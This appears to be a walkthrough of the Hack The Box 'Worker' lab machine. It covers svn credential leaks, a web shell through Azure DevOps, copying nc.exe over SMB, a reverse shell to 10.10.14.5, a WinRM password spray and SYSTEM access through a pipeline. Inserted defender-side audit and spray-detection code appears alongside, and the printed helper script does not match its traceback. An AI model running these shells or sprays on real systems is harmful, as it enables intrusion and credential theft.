
Worker

Machine Name   Level    OS
Worker - HTB   Medium   Windows

Walkthrough

Let's start with an nmap scan.


PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/10.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3690/tcp open  svnserve Subversion
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

After spotting svn I started enumerating it. WinRM (WS-Man, port 5985) is also open, which means that if we can identify a valid user we will be able to connect. The presence of svn also made me think a software project might be hosted here. My svn investigation is below.


┌──(root💀kali)-[~/oscp/htb/Worker]
└─# svn ls svn://10.10.10.203
dimension.worker.htb/
moved.txt

┌──(root💀kali)-[~/oscp/htb/Worker]
└─# svn log svn://10.10.10.203
------------------------------------------------------------------------
r5 | nathen | 2020-06-20 09:52:00 -0400 (Sat, 20 Jun 2020) | 1 line

Added note that repo has been migrated
------------------------------------------------------------------------
r4 | nathen | 2020-06-20 09:50:20 -0400 (Sat, 20 Jun 2020) | 1 line

Moving this repo to our new devops server which will handle the deployment for us
------------------------------------------------------------------------
r3 | nathen | 2020-06-20 09:46:19 -0400 (Sat, 20 Jun 2020) | 1 line

-
------------------------------------------------------------------------
r2 | nathen | 2020-06-20 09:45:16 -0400 (Sat, 20 Jun 2020) | 1 line

Added deployment script
------------------------------------------------------------------------
r1 | nathen | 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020) | 1 line

First version
------------------------------------------------------------------------

┌──(root💀kali)-[~/oscp/htb/Worker]
└─# svn checkout svn://10.10.10.203
A    dimension.worker.htb
A    dimension.worker.htb/LICENSE.txt
A    dimension.worker.htb/README.txt
A    dimension.worker.htb/assets
A    dimension.worker.htb/assets/css
A    dimension.worker.htb/assets/css/fontawesome-all.min.css
A    dimension.worker.htb/assets/css/main.css
A    dimension.worker.htb/assets/css/noscript.css
A    dimension.worker.htb/assets/js
A    dimension.worker.htb/assets/js/breakpoints.min.js
A    dimension.worker.htb/assets/js/browser.min.js
A    dimension.worker.htb/assets/js/jquery.min.js
A    dimension.worker.htb/assets/js/main.js
A    dimension.worker.htb/assets/js/util.js
A    dimension.worker.htb/assets/sass
A    dimension.worker.htb/assets/sass/base
A    dimension.worker.htb/assets/sass/base/_page.scss
A    dimension.worker.htb/assets/sass/base/_reset.scss
A    dimension.worker.htb/assets/sass/base/_typography.scss
A    dimension.worker.htb/assets/sass/components
A    dimension.worker.htb/assets/sass/components/_actions.scss
A    dimension.worker.htb/assets/sass/components/_box.scss
A    dimension.worker.htb/assets/sass/components/_button.scss
A    dimension.worker.htb/assets/sass/components/_form.scss
A    dimension.worker.htb/assets/sass/components/_icon.scss
A    dimension.worker.htb/assets/sass/components/_icons.scss
A    dimension.worker.htb/assets/sass/components/_image.scss
A    dimension.worker.htb/assets/sass/components/_list.scss
A    dimension.worker.htb/assets/sass/components/_table.scss
A    dimension.worker.htb/assets/sass/layout
A    dimension.worker.htb/assets/sass/layout/_bg.scss
A    dimension.worker.htb/assets/sass/layout/_footer.scss
A    dimension.worker.htb/assets/sass/layout/_header.scss
A    dimension.worker.htb/assets/sass/layout/_main.scss
A    dimension.worker.htb/assets/sass/layout/_wrapper.scss
A    dimension.worker.htb/assets/sass/libs
A    dimension.worker.htb/assets/sass/libs/_breakpoints.scss
A    dimension.worker.htb/assets/sass/libs/_functions.scss
A    dimension.worker.htb/assets/sass/libs/_mixins.scss
A    dimension.worker.htb/assets/sass/libs/_vars.scss
A    dimension.worker.htb/assets/sass/libs/_vendor.scss
A    dimension.worker.htb/assets/sass/main.scss
A    dimension.worker.htb/assets/sass/noscript.scss
A    dimension.worker.htb/assets/webfonts
A    dimension.worker.htb/assets/webfonts/fa-brands-400.eot
A    dimension.worker.htb/assets/webfonts/fa-brands-400.svg
A    dimension.worker.htb/assets/webfonts/fa-brands-400.ttf
A    dimension.worker.htb/assets/webfonts/fa-brands-400.woff
A    dimension.worker.htb/assets/webfonts/fa-brands-400.woff2
A    dimension.worker.htb/assets/webfonts/fa-regular-400.eot
A    dimension.worker.htb/assets/webfonts/fa-regular-400.svg
A    dimension.worker.htb/assets/webfonts/fa-regular-400.ttf
A    dimension.worker.htb/assets/webfonts/fa-regular-400.woff
A    dimension.worker.htb/assets/webfonts/fa-regular-400.woff2
A    dimension.worker.htb/assets/webfonts/fa-solid-900.eot
A    dimension.worker.htb/assets/webfonts/fa-solid-900.svg
A    dimension.worker.htb/assets/webfonts/fa-solid-900.ttf
A    dimension.worker.htb/assets/webfonts/fa-solid-900.woff
A    dimension.worker.htb/assets/webfonts/fa-solid-900.woff2
A    dimension.worker.htb/images
A    dimension.worker.htb/images/bg.jpg
A    dimension.worker.htb/images/overlay.png
A    dimension.worker.htb/images/pic01.jpg
A    dimension.worker.htb/images/pic02.jpg
A    dimension.worker.htb/images/pic03.jpg
A    dimension.worker.htb/index.html
A    moved.txt
Checked out revision 5.

┌──(root💀kali)-[~/oscp/htb/Worker]
└─# s                              
s: command not found

┌──(root💀kali)-[~/oscp/htb/Worker]
└─# ls                                                                                                                                                                                                                                  127 ⨯
10.10.10.203  dimension.worker.htb  gobuster1  gobuster2  moved.txt

┌──(root💀kali)-[~/oscp/htb/Worker]
└─# cat moved.txt       
This repository has been migrated and will no longer be maintaned here.
You can find the latest version at: http://devops.worker.htb

// The Worker team :)

After updating my /etc/hosts file, I continued by checking the other revisions in svn.


┌──(root💀kali)-[~/oscp/htb/Worker/dimension.worker.htb]
└─# cd ..                  

┌──(root💀kali)-[~/oscp/htb/Worker]
└─# svn up -r 2
Updating '.':
D    moved.txt
A    deploy.ps1
Updated to revision 2.

┌──(root💀kali)-[~/oscp/htb/Worker]
└─# ls -al        
total 32
drwxr-xr-x  5 root root 4096 Aug 10 06:31 .
drwxr-xr-x 26 root root 4096 Aug 10 05:10 ..
drwxr-xr-x  4 root root 4096 Aug 10 05:28 10.10.10.203
-rw-r--r--  1 root root  271 Aug 10 06:31 deploy.ps1
drwxr-xr-x  4 root root 4096 Aug 10 06:19 dimension.worker.htb
-rw-r--r--  1 root root 1065 Aug 10 06:19 gobuster1
-rw-r--r--  1 root root 1093 Aug 10 06:21 gobuster2
drwxr-xr-x  4 root root 4096 Aug 10 06:18 .svn

┌──(root💀kali)-[~/oscp/htb/Worker]
└─# cat deploy.ps1 
$user = "nathen" 
$plain = "wendel98"
$pwd = ($plain | ConvertTo-SecureString)
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
$args = "Copy-Site.ps1"
Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")

We found a great user. I tried to connect over WinRM but did not succeed. Then, going to http://devops.worker.htb, I was able to log in to the basic authentication prompt with nathen:wendel98. When I worked as a developer at the Ministry of Health we used TFS for process tracking. I like Microsoft, and there is a similar TFS on Azure. Tasks had been created and commits matching those tasks had been entered. It was very clear that my goal was to get a reverse shell through one of these projects and connect to the machine.

I picked a project and created a new branch, then merged it; that way I was able to upload my web shell. The screenshot of this is below.

Now let's view the web shell. For this I updated my /etc/hosts file again.

I started an SMB server on my Kali box and copied nc.exe over to the target machine. After that I got a reverse shell.


┌──(root💀kali)-[~/oscp/htb/Worker]
└─# /usr/local/bin/smbserver.py KUDAY . -smb2support                                                                                                                                                                                    130 ⨯
Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.203,52693)
[*] AUTHENTICATE_MESSAGE (\,WORKER)
[*] User WORKER\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:KUDAY)
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:KUDAY)
[*] Closing down connection (10.10.10.203,52693)
[*] Remaining connections []

The payload I used to send nc.exe: copy \\10.10.14.5\KUDAY\nc.exe C:\Windows\Temp\nc.exe

C:\Windows\Temp\nc.exe -e cmd.exe 10.10.14.5 443

┌──(root💀kali)-[~/oscp/htb/Worker]
└─# nc -lvp 443 
listening on [any] 443 ...
connect to [10.10.14.5] from alpha.worker.htb [10.10.10.203] 52695
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.

w:\sites\alpha.worker.htb>

After this point I did a lot of inspection and used automated scripts, but nothing useful came out. Then I started inspecting the W:\ drive manually. When I started PowerShell and entered the command below, I got interesting results.

Get-ChildItem -Recurse | Select-String "pass" -List | Select Path

...
W:\sites\twenty.worker.htb\assets\webfonts\fa-regular-400.svg         
W:\sites\twenty.worker.htb\assets\webfonts\fa-regular-400.ttf         
W:\sites\twenty.worker.htb\assets\webfonts\fa-solid-900.eot           
W:\sites\twenty.worker.htb\assets\webfonts\fa-solid-900.svg           
W:\sites\twenty.worker.htb\assets\webfonts\fa-solid-900.ttf           
W:\svnrepos\www\conf\passwd                                           
W:\svnrepos\www\conf\svnserve.conf                                    
W:\svnrepos\www\db\revs\0\1                                           
W:\svnrepos\www\db\revs\0\3                                           
W:\svnrepos\www\hooks\post-commit.tmpl                                
W:\svnrepos\www\hooks\post-lock.tmpl                                  
W:\svnrepos\www\hooks\post-revprop-change.tmpl                        
W:\svnrepos\www\hooks\post-unlock.tmpl                                
W:\svnrepos\www\hooks\pre-commit.tmpl                                 
W:\svnrepos\www\hooks\pre-lock.tmpl                                   
W:\svnrepos\www\hooks\pre-revprop-change.tmpl                         
W:\svnrepos\www\hooks\pre-unlock.tmpl                                 
W:\svnrepos\www\hooks\start-commit.tmpl   

When I read the passwd file I found usernames and passwords. Let's test them right away.


PS W:\svnrepos\www\conf> cat passwd
cat passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.

[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday
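A defender-side check for what this file shows, as an added example that is not part of the original post: it parses an svnserve passwd file (the `[users]` section, `name = password` lines, `###` comments), pulls the literal `$user`/`$plain` assignment out of a deploy script shaped like the deploy.ps1 above, and reports duplicate user entries, very short passwords, plaintext credentials in scripts, and reuse of the same pair across both sources. The sample inputs are constructed from entries shown on this page (shortened); the variable names `$user` and `$plain` are an assumption that matches the script above.

```python
import re
from collections import Counter

# Constructed sample (shortened): the shape of an svnserve passwd file,
# with a "[users]" section, "name = password" lines and "###" comments.
SVN_PASSWD = """\
### This file is an example password file for svnserve.
[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
robisl = wolves11
rubkei = the
"""

# Constructed sample: the deploy script from the walkthrough. Piping a string
# literal through ConvertTo-SecureString protects nothing; the plaintext is
# still in the file (and in every svn revision that contained it).
DEPLOY_PS1 = """\
$user = "nathen"
$plain = "wendel98"
$pwd = ($plain | ConvertTo-SecureString)
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
"""


def parse_svnserve_passwd(text):
    """Return (user, password) tuples from the [users] section.
    Duplicates are kept so that they can be reported."""
    entries = []
    in_users = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_users = line[1:-1].strip().lower() == "users"
            continue
        if in_users and "=" in line:
            user, _, password = line.partition("=")
            entries.append((user.strip(), password.strip()))
    return entries


# Matches PowerShell lines of the form:  $name = "literal"
PS_VAR_ASSIGN = re.compile(r'^\s*\$(\w+)\s*=\s*"([^"]*)"\s*$', re.M)


def extract_ps_credential(text):
    """Pull the $user/$plain literal assignments out of a PowerShell script.
    Assumption: the script uses those two variable names, as deploy.ps1 does."""
    assigned = dict(PS_VAR_ASSIGN.findall(text))
    if "user" in assigned and "plain" in assigned:
        return (assigned["user"], assigned["plain"])
    return None


def audit(svn_text, ps_text, min_len=8):
    """Return a list of findings a defender would act on."""
    findings = []
    entries = parse_svnserve_passwd(svn_text)
    for user, n in Counter(u for u, _ in entries).items():
        if n > 1:
            findings.append(f"duplicate svnserve user entry: {user} ({n} lines)")
    for user, pw in entries:
        if len(pw) < min_len:
            findings.append(f"short password for {user}: {len(pw)} chars")
    cred = extract_ps_credential(ps_text)
    if cred:
        findings.append(f"plaintext credential in deploy script: {cred[0]}")
        if cred in entries:
            findings.append(f"deploy-script credential reused in svnserve passwd: {cred[0]}")
    return findings


if __name__ == "__main__":
    for finding in audit(SVN_PASSWD, DEPLOY_PS1):
        print(finding)
```

Run on the two constructed inputs it reports the duplicated `nichin` entry, the three-character `rubkei` password, the plaintext credential in the script, and the fact that the same nathen pair is valid for svnserve; on the machine that pair also opened the basic-auth prompt on devops.worker.htb, which is exactly the reuse this kind of check is meant to surface before someone else does.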

I quickly built my wordlists.

┌──(root💀kali)-[~/oscp/htb/Worker/Users]
└─# cat cred       
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday

┌──(root💀kali)-[~/oscp/htb/Worker/Users]
└─# cat convert.py    
# Read the "user = password" lines. Splitting on "\n" leaves an empty last
# element because of the trailing newline; that element is skipped below.
dosya = open("cred")
cred = dosya.read().split("\n")
dosya.close()

# "w" rather than "a" so that re-running the script does not duplicate lines
dosya4username = open("username", "w")
dosya4password = open("password", "w")
for i in cred:
    parts = i.replace("=", " ").split()
    if len(parts) < 2:
        continue  # empty or malformed line (e.g. the trailing blank one)
    dosya4username.write(parts[0] + "\n")
    dosya4password.write(parts[1] + "\n")
dosya4username.close()
dosya4password.close()

┌──(root💀kali)-[~/oscp/htb/Worker/Users]
└─# python3 convert.py
Traceback (most recent call last):
  File "/root/oscp/htb/Worker/Users/convert.py", line 11, in <module>
    dosya4username.write(i.replace("="," ").split()[0]+"\n")
IndexError: list index out of range

┌──(root💀kali)-[~/oscp/htb/Worker/Users]
└─# cat username                                                                                                                                                        1 ⨯
nathen
nichin
nichin
noahip
nuahip
oakhol
owehol
paihol
parhol
pathop
pauhor
payhos
perhou
peyhou
phihou
quehub
quihud
rachul
raehun
ramhun
ranhut
rebhyd
reeinc
reeing
reiing
renipr
rhiire
riairv
ricisa
robish
robisl
robive
ronkay
rubkei
rupkel
ryakel
sabken
samken
sapket
sarkil

┌──(root💀kali)-[~/oscp/htb/Worker/Users]
└─# cat password 
wendel98
fqerfqerf
asifhiefh
player
wkjdnw
bxwdjhcue
supersecret
painfulcode
gitcommit
iliketomoveit
nowayjose
icanjive
elvisisalive
ineedvacation
pokemon
pickme
kindasecure
guesswho
idontknow
thisis
getting
rediculous
iagree
tosomepoint
isthisenough
dummy
users
canyou
seewhich
onesare
wolves11
andwhich
onesare
the
sheeps
imtired
drjones
aqua
hamburger
friday

There is a Python error there, but it occurs at the very end of the program; anyone who knows Python will understand it. It is caused by the empty element left at the end when the file is read (the trailing newline). Nothing to worry about. Now let's try!

┌──(root💀kali)-[~/oscp/htb/Worker/Users]
└─# crackmapexec winrm  -u username -p password --no-bruteforce 10.10.10.203
WINRM       10.10.10.203    5985   NONE             [*] None (name:10.10.10.203) (domain:None)
WINRM       10.10.10.203    5985   NONE             [*] http://10.10.10.203:5985/wsman
WINRM       10.10.10.203    5985   NONE             [-] None\nathen:wendel98
WINRM       10.10.10.203    5985   NONE             [-] None\nichin:fqerfqerf
WINRM       10.10.10.203    5985   NONE             [-] None\nichin:asifhiefh
WINRM       10.10.10.203    5985   NONE             [-] None\noahip:player
WINRM       10.10.10.203    5985   NONE             [-] None\nuahip:wkjdnw
WINRM       10.10.10.203    5985   NONE             [-] None\oakhol:bxwdjhcue
WINRM       10.10.10.203    5985   NONE             [-] None\owehol:supersecret
WINRM       10.10.10.203    5985   NONE             [-] None\paihol:painfulcode
WINRM       10.10.10.203    5985   NONE             [-] None\parhol:gitcommit
WINRM       10.10.10.203    5985   NONE             [-] None\pathop:iliketomoveit
WINRM       10.10.10.203    5985   NONE             [-] None\pauhor:nowayjose
WINRM       10.10.10.203    5985   NONE             [-] None\payhos:icanjive
WINRM       10.10.10.203    5985   NONE             [-] None\perhou:elvisisalive
WINRM       10.10.10.203    5985   NONE             [-] None\peyhou:ineedvacation
WINRM       10.10.10.203    5985   NONE             [-] None\phihou:pokemon
WINRM       10.10.10.203    5985   NONE             [-] None\quehub:pickme
WINRM       10.10.10.203    5985   NONE             [-] None\quihud:kindasecure
WINRM       10.10.10.203    5985   NONE             [-] None\rachul:guesswho
WINRM       10.10.10.203    5985   NONE             [-] None\raehun:idontknow
WINRM       10.10.10.203    5985   NONE             [-] None\ramhun:thisis
WINRM       10.10.10.203    5985   NONE             [-] None\ranhut:getting
WINRM       10.10.10.203    5985   NONE             [-] None\rebhyd:rediculous
WINRM       10.10.10.203    5985   NONE             [-] None\reeinc:iagree
WINRM       10.10.10.203    5985   NONE             [-] None\reeing:tosomepoint
WINRM       10.10.10.203    5985   NONE             [-] None\reiing:isthisenough
WINRM       10.10.10.203    5985   NONE             [-] None\renipr:dummy
WINRM       10.10.10.203    5985   NONE             [-] None\rhiire:users
WINRM       10.10.10.203    5985   NONE             [-] None\riairv:canyou
WINRM       10.10.10.203    5985   NONE             [-] None\ricisa:seewhich
WINRM       10.10.10.203    5985   NONE             [-] None\robish:onesare
WINRM       10.10.10.203    5985   NONE             [+] None\robisl:wolves11 (Pwn3d!)
robisl:wolves11
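The spray above is also what the target's Security log would record: a burst of failed network logons (event 4625) for many different accounts from one source address, followed by a success (4624) for the account that matched. The following is an added example, not part of the original walkthrough, of detection logic over constructed sample lines in a simplified `timestamp event_id logon_type src_ip user` form (an assumed SIEM export shape, not a real Windows log layout). It flags any source that fails against at least five distinct users inside a five-minute window and lists the accounts that succeeded from that source in the same window.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log (not from the walkthrough). Fields:
#   timestamp  event_id  logon_type  src_ip  user
# 4625 = failed logon, 4624 = successful logon, logon type 3 = network (WinRM).
SAMPLE_LOG = """\
2021-08-10T06:40:01 4625 3 10.10.14.5 nathen
2021-08-10T06:40:02 4625 3 10.10.14.5 nichin
2021-08-10T06:40:02 4625 3 10.10.14.5 noahip
2021-08-10T06:40:03 4625 3 10.10.14.5 nuahip
2021-08-10T06:40:03 4625 3 10.10.14.5 oakhol
2021-08-10T06:40:04 4625 3 10.10.14.5 owehol
2021-08-10T06:40:04 4625 3 10.10.14.5 paihol
2021-08-10T06:40:05 4625 3 10.10.14.5 parhol
2021-08-10T06:40:05 4625 3 10.10.14.5 pathop
2021-08-10T06:40:06 4625 3 10.10.14.5 pauhor
2021-08-10T06:40:06 4624 3 10.10.14.5 robisl
2021-08-10T06:55:00 4625 3 10.10.10.50 nathen
2021-08-10T06:56:00 4624 3 10.10.10.50 nathen
"""


def parse_events(text):
    """Parse the simplified export format into a list of event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, logon_type, src, user = line.split()
        events.append({
            "time": datetime.fromisoformat(ts),
            "event_id": int(event_id),
            "logon_type": int(logon_type),
            "src": src,
            "user": user,
        })
    return events


def detect_spray(events, window=timedelta(minutes=5), min_users=5):
    """One alert per source address whose network logon failures cover at
    least `min_users` distinct accounts inside `window`. Successes from the
    same source within that window are listed so that the responder knows
    which account to reset first."""
    by_src = defaultdict(list)
    for e in events:
        if e["logon_type"] == 3:          # only network logons matter here
            by_src[e["src"]].append(e)

    alerts = []
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["time"])
        for i, start in enumerate(evs):
            in_window = [e for e in evs[i:] if e["time"] - start["time"] <= window]
            failed = {e["user"] for e in in_window if e["event_id"] == 4625}
            if len(failed) >= min_users:
                succeeded = sorted({e["user"] for e in in_window if e["event_id"] == 4624})
                alerts.append({
                    "src": src,
                    "first_seen": start["time"].isoformat(),
                    "failed_users": len(failed),
                    "succeeded": succeeded,
                })
                break   # one alert per source is enough
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(parse_events(SAMPLE_LOG)):
        print(alert)
```

The distinct-user count is what separates a spray from a single user mistyping a password: 10.10.10.50 fails once and then succeeds as the same account, so it produces no alert, while 10.10.14.5 touches ten accounts in six seconds and lands on robisl. Counting distinct users per source rather than failures per account is also why the usual per-account lockout threshold never fires during a spray.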

Great! Let's connect with evil-winrm.


┌──(root💀kali)-[~/oscp/htb/Worker]
└─# evil-winrm -i 10.10.10.203 -u robisl -p wolves11                                                                                                                                                                                    130 ⨯

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\robisl\Documents> cd ..
*Evil-WinRM* PS C:\Users\robisl> ls

    Directory: C:\Users\robisl

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---         4/5/2020   7:32 PM                Desktop
d-r---         4/4/2020  11:35 PM                Documents
d-r---        9/15/2018   9:12 AM                Downloads
d-r---        9/15/2018   9:12 AM                Favorites
d-r---        9/15/2018   9:12 AM                Links
d-r---        9/15/2018   9:12 AM                Music
d-r---        9/15/2018   9:12 AM                Pictures
d-----        9/15/2018   9:12 AM                Saved Games
d-r---        9/15/2018   9:12 AM                Videos

*Evil-WinRM* PS C:\Users\robisl> cd Desktop
*Evil-WinRM* PS C:\Users\robisl\Desktop> ls

    Directory: C:\Users\robisl\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        8/10/2021   8:59 PM             34 user.txt

*Evil-WinRM* PS C:\Users\robisl\Desktop> cat user.txt
5455ed43a205185208157dcc76502d43
*Evil-WinRM* PS C:\Users\robisl\Desktop> 

Afterwards I logged in to Azure DevOps again with this user and saw a different project. I noticed that I could create Pipelines. I should state up front that DevOps is not an area I know very well, so I won't talk here about things I'm not sure of. I'm waiting for Pentester Academy's trainings 🙂 But I do know that pipelines let me run code at the operating-system level. When I ran code along the lines shown below, I got a reverse shell with root rights (so to speak; the machine is Windows).

┌──(root💀kali)-[~/oscp/htb/Worker]
└─# nc -lvp 443                                                                                                  1 ⨯
listening on [any] 443 ...
connect to [10.10.14.5] from devops.worker.htb [10.10.10.203] 50788
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.

W:\agents\agent11\_work\8\s>whoami
whoami
nt authority\system

W:\agents\agent11\_work\8\s>c:
c:

C:\>dir "*root*.txt" /s /p
dir "*root*.txt" /s /p
 Volume in drive C has no label.
 Volume Serial Number is 32D6-9041

 Directory of C:\Users\Administrator\Desktop

2021-08-10  20:59                34 root.txt
               1 File(s)             34 bytes

     Total Files Listed:
               1 File(s)             34 bytes
               0 Dir(s)  10 384 883 712 bytes free

C:\>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>dtype root.txt
dtype root.txt
'dtype' is not recognized as an internal or external command,
operable program or batch file.

C:\Users\Administrator\Desktop>type root.txt
type root.txt
fdae81646ff993d7125b423f6fd93f8d

Category: Devops, Walkthrough, Windows
